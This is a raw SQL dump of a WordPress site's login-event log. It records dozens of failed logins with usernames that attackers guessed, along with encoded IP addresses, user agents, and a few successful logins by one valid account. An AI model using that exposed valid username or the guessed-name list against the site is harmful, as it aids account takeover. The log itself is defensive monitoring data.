(9553, 39055, 1700699676.543699, 1, 'loginFailInvalidUsername', 'password123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)"Óœ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'),
(9554, 39056, 1700699682.600350, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿpÅž©', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'),
(9555, 39057, 1700699696.614421, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¨µÐ‡', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),
(9556, 39058, 1700699699.809790, 1, 'loginFailInvalidUsername', '0005215210001!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ*r¹', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),
(9476, 35799, 1699943291.566603, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¬é˜9', 'Mozilla/5.0'),
(9477, 35842, 1699988777.934948, 1, 'loginFailInvalidUsername', 'wpmanager', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ”ûø', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9474, 35713, 1699851096.043252, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)Þ´b', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9478, 35843, 1699988834.548286, 1, 'loginFailInvalidUsername', 'wpenginesupport', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿVoòa', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9475, 35753, 1699891457.999043, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿv¤Š', 'Mozilla/5.0'),
(9479, 35844, 1699988855.836020, 1, 'loginFailInvalidUsername', '1001010', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz›j', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9480, 35845, 1699988879.542377, 1, 'loginFailInvalidUsername', 'woopayplug', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÎ½¾', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9481, 35846, 1699988991.855681, 1, 'loginFailInvalidUsername', 'WPADMIN', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿæ.Å', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9482, 35849, 1699992372.292673, 1, 'loginFailInvalidUsername', 'wadminw', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÍ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9483, 35850, 1699992429.247251, 1, 'loginFailInvalidUsername', 'wpmanager', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¥ßu', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9484, 35851, 1699992471.350269, 1, 'loginFailInvalidUsername', 'wpadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ>—²?', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9485, 35852, 1699992635.685250, 1, 'loginFailInvalidUsername', 'itsme', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹¨}', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9486, 35853, 1699992636.469392, 1, 'loginFailInvalidUsername', 'WPADMIN', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇnS', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9487, 35884, 1699994921.029080, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¬é˜9', 'Mozilla/5.0'),
(9488, 35894, 1699997096.249998, 1, 'loginFailInvalidUsername', 'matakucing3', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\rÖn8', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9489, 35895, 1699997149.693236, 1, 'loginFailInvalidUsername', 'smngrs952', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ÛHÝ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9490, 35896, 1699997205.724247, 1, 'loginFailInvalidUsername', 'smngrs955', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆGã"', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9491, 35898, 1699999017.588376, 1, 'loginFailInvalidUsername', 'matakucing3', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ“2Àl', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9492, 35899, 1699999087.107884, 1, 'loginFailInvalidUsername', 'pajero_sports', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgwäx', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9493, 35900, 1699999087.877374, 1, 'loginFailInvalidUsername', 'smngrs952', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÁ''þa', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9494, 35901, 1699999161.901964, 1, 'loginFailInvalidUsername', 'smngrs955', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"{X', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9495, 35904, 1700001807.999443, 1, 'loginFailInvalidUsername', 'bapaksaya', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ&òç×', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9496, 35905, 1700002483.412313, 1, 'loginFailInvalidUsername', 'wordpress_administrator', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ#Æ/-', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9557, 39059, 1700699707.267293, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶L¼Œ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),
(9558, 39060, 1700699712.640000, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg­r', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),
(9559, 39061, 1700699715.455216, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºm.', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9560, 39062, 1700699721.289442, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿBà', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9561, 39063, 1700699724.243405, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³kƒa', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36'),
(9562, 39064, 1700699727.475428, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿËÊþ’', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36'),
(9563, 39068, 1700702527.468909, 1, 'loginFailInvalidUsername', 'wpadmins', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆGí', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9564, 39069, 1700702532.891338, 1, 'loginFailInvalidUsername', 'wpadmins', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ#Õ–ä', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9565, 39070, 1700702640.095026, 1, 'loginFailInvalidUsername', 'yanz@123457', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿY—k[', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9566, 39070, 1700702640.108760, 1, 'loginFailInvalidUsername', 'yanz@123457', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿY—k[', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9567, 39071, 1700702685.493919, 1, 'loginFailInvalidUsername', 'Adsystem', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÌÚs', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9568, 39072, 1700702711.194723, 1, 'loginFailInvalidUsername', 'Adsystem', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÃàc¼', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9569, 39073, 1700702733.844970, 1, 'loginFailInvalidUsername', 'admin6', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈ›:"', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9570, 39074, 1700702810.385191, 1, 'loginFailInvalidUsername', 'user', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿY¸Y¢', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9571, 39075, 1700702843.619611, 1, 'loginFailInvalidUsername', 'support', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇ¼Í5', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9572, 39076, 1700702878.035118, 1, 'loginFailInvalidUsername', 'yeuthuongmongmanh', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÁ''þa', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9573, 39078, 1700702937.628709, 1, 'loginFailInvalidUsername', 'wpsystem', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸA„', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9574, 39080, 1700702995.927477, 1, 'loginFailInvalidUsername', 'wp-admine', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶2„Q', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9575, 39082, 1700703050.084898, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-?»', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9917, 44319, 1704360573.747678, 1, 'loginFailInvalidUsername', 'bapaksaya', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÏ´Î„', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9918, 44320, 1704360644.703616, 1, 'loginFailInvalidUsername', 'wordpress_administrator', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ²¸“', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9919, 44326, 1704366313.928232, 1, 'loginFailInvalidUsername', 'Casper_Security', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ6&OË', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9705, 41325, 1701186895.009506, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9706, 41326, 1701188591.310317, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ6n', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)'),
(9707, 41327, 1701188928.412869, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½z', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)'),
(9708, 41331, 1701191022.313066, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2'),
(9709, 41332, 1701191510.355136, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),
(9710, 41333, 1701193184.916733, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇÃùÛ', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9711, 41334, 1701193635.910659, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¸c', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9712, 41339, 1701198242.752372, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ)E', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9713, 41341, 1701199018.421644, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9737, 41398, 1701229411.108957, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¸c', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36'),
(9738, 41406, 1701231127.335102, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9739, 41422, 1701233686.874779, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½z', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9740, 41423, 1701234112.966175, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9741, 41429, 1701234504.760391, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),
(9742, 41432, 1701236164.028252, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½:', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),
(9743, 41437, 1701236537.453934, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇÃùÛ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),
(9744, 41441, 1701236956.635776, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53'),
(9745, 41472, 1701238665.866097, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),
(9746, 41475, 1701239557.314146, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ!¨', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53'),
(9747, 41485, 1701243637.001612, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½Q', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9748, 41486, 1701244079.164225, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½þ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),
(9749, 41488, 1701246228.052722, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9750, 41489, 1701246675.012233, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9751, 41490, 1701247220.275283, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9752, 41500, 1701249446.670076, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ)E', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),
(9753, 41501, 1701249853.270619, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¸c', 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9754, 41516, 1701252443.967068, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9755, 41517, 1701252476.428253, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(9756, 41518, 1701252702.025555, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9757, 41528, 1701254109.648073, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ)E', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9758, 41530, 1701254887.787599, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9759, 41541, 1701256875.414740, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¹ö', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9760, 41549, 1701256920.904050, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb:M', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9438, 33212, 1694837393.850918, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿä†Ô', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),
(9439, 33213, 1694837401.128485, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´Â-…', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36'),
(9440, 33214, 1694837406.053962, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾€Ç2', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9441, 33215, 1694837411.072678, 1, 'loginFailInvalidUsername', 'happythinking@126.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg÷', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),
(9442, 33216, 1694837416.712590, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿiœ%²', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),
(9443, 33217, 1694837421.987179, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿjÔY', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'),
(9444, 33218, 1694837440.890891, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$QMñ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'),
(9445, 33219, 1694837446.226055, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´þáÊ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9446, 33219, 1694837446.235728, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´þáÊ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9447, 33220, 1694837451.326706, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿnˆÙ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36'),
(9448, 33221, 1694837456.023640, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ;gé', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),
(10347, 51117, 1712319206.520756, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ¤¶2', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10348, 51118, 1712319207.203394, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·R!Z', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10349, 51119, 1712319211.253258, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¥3g', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10350, 51120, 1712319212.421444, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹Û•', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10351, 51123, 1712319217.773975, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ[–kC', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10352, 51124, 1712319217.970819, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±&Vþ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10353, 51125, 1712319230.178666, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgd¯', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10354, 51125, 1712319230.191110, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgd¯', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10355, 51127, 1712319237.957145, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿWîÕl', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10356, 51129, 1712319241.200584, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿV~•Û', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10357, 51131, 1712319253.139915, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ—7ÉÄ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9466, 34034, 1697092000.342248, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ^B³O', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),
